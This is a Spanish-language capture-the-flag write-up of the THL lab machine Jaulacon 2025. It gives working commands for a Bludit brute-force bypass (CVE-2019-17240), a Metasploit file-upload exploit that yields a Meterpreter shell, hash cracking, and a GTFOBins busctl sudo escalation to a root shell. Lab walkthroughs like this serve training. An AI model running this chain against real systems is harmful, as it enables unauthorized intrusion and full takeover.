El sótano de c0k3r0

Portfolio técnico de máquinas resueltas

View on GitHub

🧠 Write-up: Jaulacon 2025 (THL)

portada


📸 Evidencias del proceso

Fase de Reconocimiento

Utilizamos nmap con parametros agresivos para descubrir servicios expuestos:

1

nmap -p- --open --min-rate=5000 -sSCV -n -Pn 10.0.2.10

Servicios detectados:

Fuzzing y Recolección de Información

Usamos gobuster para enumerar directorios:

2

gobuster dir -u http://10.0.2.10 -w /usr/share/wordlists/dirb/common.txt

Directorios destacados:

La pagina principal revelo el nombre de usuario Jaulacon2025. Se confirmo que el CMS usado era Bludit.

3

Explotación: Bypass de Bruteforce (CVE-2019-17240)

Se identifico una vulnerabilidad en Bludit 3.9.2 que permite saltarse la mitigacion de brute force.

4

git clone https://github.com/0xDTC/Bludit-3.9.2-Auth-Bruteforce-Bypass-CVE-2019
17240
cd Bludit-3.9.2-Auth-Bruteforce-Bypass-CVE-2019-17240
bash CVE-2019-17240 -u http://10.0.2.10/admin/login.php -U Jaulacon2025 -w 
/usr/share/wordlists/rockyou.txt

5

Resultado: Se encontro la contrasena cassandra.

6

Acceso al panel de administración

Credenciales validas (Jaulacon2025:cassandra) permitieron acceso al panel /admin.

7

Explotación con Metasploit

Con las credenciales obtenidas Bludit es vulnerable a subida de archivos con ejecucion remota:

8

 msf6 > use exploit/linux/http/bludit_upload_images_exec

Configuración:

9

Resultado: Shell Meterpreter obtenida.

10

Post-Explotación

Desde Meterpreter se verificó el sistema de archivos. Se revisó el archivo users.php y se encontraron hashes:

11

Tras descifrar el hash con CrackStation, se obtuvo la contrasena “Brutales” para el usuario “Jaulacon2025”

12

Escalada de Privilegios

Se accedió por SSH.

13

ssh Jaulacon2025@10.0.2.1

Password: Brutales

Se identificó que busctl podía ser ejecutado como root sin contrasena:

14

sudo -l

Tecnica de escalada de privilegios tomada desde GTFOBins:

15

 sudo busctl set-property org.freedesktop.systemd1 
/org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s 
debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 
1>&2'

Acceso como Root

16


🧾 Conclusión

Este CTF demostro multiples vectores de ataque:

Una cadena excelente de explotacion realista y formativa

Write-up realizado por c0k3r0 — El Sótano de c0k3r0 �

⬅️ Volver al inicio